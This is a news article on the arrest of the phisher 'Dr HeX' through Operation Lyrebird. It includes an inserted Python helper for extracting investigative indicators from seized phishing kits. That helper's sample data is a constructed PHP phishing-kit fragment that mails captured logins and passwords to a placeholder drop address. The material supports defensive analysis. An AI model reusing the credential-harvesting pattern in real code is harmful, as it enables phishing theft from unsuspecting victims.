Law enforcement authorities have apprehended a threat actor presumably responsible for a number of attacks on telecom companies, major banks, and multinational corporations in France with the goal of stealing customers' bank information.
The two-year investigation, dubbed Operation Lyrebird by the international, intergovernmental organization, resulted in the arrest of a Moroccan citizen nicknamed Dr HeX, cybersecurity firm Group-IB disclosed today in a report shared with The Hacker News.
Dr HeX is said to have been “active since at least 2009 and is responsible for a number of cybercrimes, including phishing, defacing, malware development, fraud, and carding that resulted in thousands of unsuspecting victims,” the cybersecurity.
The cyberattacks involved deploying a phishing kit consisting of web pages spoofing French companies, followed by sending mass emails impersonating the targeted companies, prompting email recipients to enter login information on the spoofed website. The credentials entered by unsuspecting victims on the fake web page were then redirected to the perpetrator's email. At least three phishing kits presumably developed by the threat actor were extracted.
The scripts included in the phishing kit contained the name Dr HeX and the individual's contact email address, which was then used to identify and deanonymize the cybercriminal, in the process uncovering a YouTube channel as well as another name used by the attacker to register at least two fraudulent domains that were used in the attacks.
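Triage of a seized kit along the lines described above, as an added illustration that is not drawn from the Group-IB report: the constructed PHP fragments below stand in for a kit's server-side scripts (assumed, as is common, to exfiltrate via PHP `mail()`), and the helper pulls out the email addresses, `mail()` recipients and author handles an analyst would pivot on.

```python
import re

# Constructed stand-in for a phishing kit's server-side scripts (not code from any real kit).
SAMPLE_KIT = {
    "login.php": (
        '<?php\n'
        '// Coded by ExampleHandle -- contact: author@placeholder.invalid\n'
        '$msg = "Login: " . $_POST["login"] . " Pass: " . $_POST["pass"];\n'
        '$to = "dropbox@placeholder.invalid";\n'
        'mail($to, "New log", $msg);\n'
        'header("Location: https://bank.example/verify");\n'
    ),
    "config.php": '<?php\n$copy = "second@placeholder.invalid";\nmail($copy, "log", $msg);\n',
}

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# First argument of mail(): either a $variable or a quoted literal.
MAIL_CALL_RE = re.compile(r"\bmail\s*\(\s*(\$\w+|\"[^\"]*\"|'[^']*')", re.I)
# Author tags kit writers commonly leave in comments ("Coded by ...").
HANDLE_RE = re.compile(r"\b(?:coded|made|hacked)\s+by\s+([A-Za-z0-9_.-]{2,40})", re.I)


def _resolve(arg, src):
    """Resolve mail()'s first argument to a literal: a quoted string, or a $var assigned in the same file."""
    if arg.startswith("$"):
        m = re.search(re.escape(arg) + r"\s*=\s*[\"']([^\"']+)[\"']", src)
        return m.group(1) if m else None
    return arg.strip("\"'")


def extract_indicators(kit):
    """Return all e-mail addresses, the resolved mail() recipients and author handles found in a kit's files."""
    emails, exfil, handles = set(), set(), set()
    for src in kit.values():
        emails.update(EMAIL_RE.findall(src))
        handles.update(HANDLE_RE.findall(src))
        for m in MAIL_CALL_RE.finditer(src):
            target = _resolve(m.group(1), src)
            if target:
                exfil.add(target)
    return {"emails": sorted(emails), "exfil_recipients": sorted(exfil), "handles": sorted(handles)}


if __name__ == "__main__":
    for key, value in extract_indicators(SAMPLE_KIT).items():
        print(f"{key}: {value}")
```

The distinction between "any address in the files" and "addresses that actually receive the harvested credentials" matters: the former includes the author's contact, the latter is the operational drop point.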
Moreover, Group-IB said it was also able to map the email address to the malicious infrastructure employed by the accused in various phishing campaigns, which included as many as five email addresses, six nicknames, and his accounts on Skype, Facebook, Instagram, and YouTube.
In all, Dr HeX's digital footprint left a tell-tale trail of malicious activity over a period stretching from 2009 to 2018, during which the threat actor defaced no fewer than 130 web pages; investigators also found posts created by the attacker on different underground forums devoted to malware trading, and evidence suggesting his involvement in attacks on French companies to steal financial information.
“The suspect, in particular, promoted the so-called Zombi Bot, which allegedly contained 814 exploits, including 72 private ones, a brute-forcer, webshell and backdoor scanners, as well as functionality to carry out DDoS attacks,” Group-IB CTO Dmitry Volkov told The Hacker News.